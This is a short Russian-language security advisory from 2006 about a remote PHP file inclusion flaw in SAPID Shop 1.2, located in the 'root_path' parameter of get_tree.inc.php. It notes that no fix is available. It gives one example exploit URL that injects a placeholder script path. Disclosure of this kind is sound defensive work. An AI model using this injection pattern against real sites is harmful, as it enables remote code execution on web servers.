PHP-инклюдинг в SAPID Shop

Дата публикации:
14.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
6955
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SAPID Shop 1.x
Уязвимые версии: SAPID Shop 1.2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "root_path" в сценарии usr/extensions/get_tree.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://www.site.com/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]

URL производителя: sapid.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: SAPID Shop <= 1.2 (root_path) Remote File Include Vulnerability

или введите имя

CAPTCHA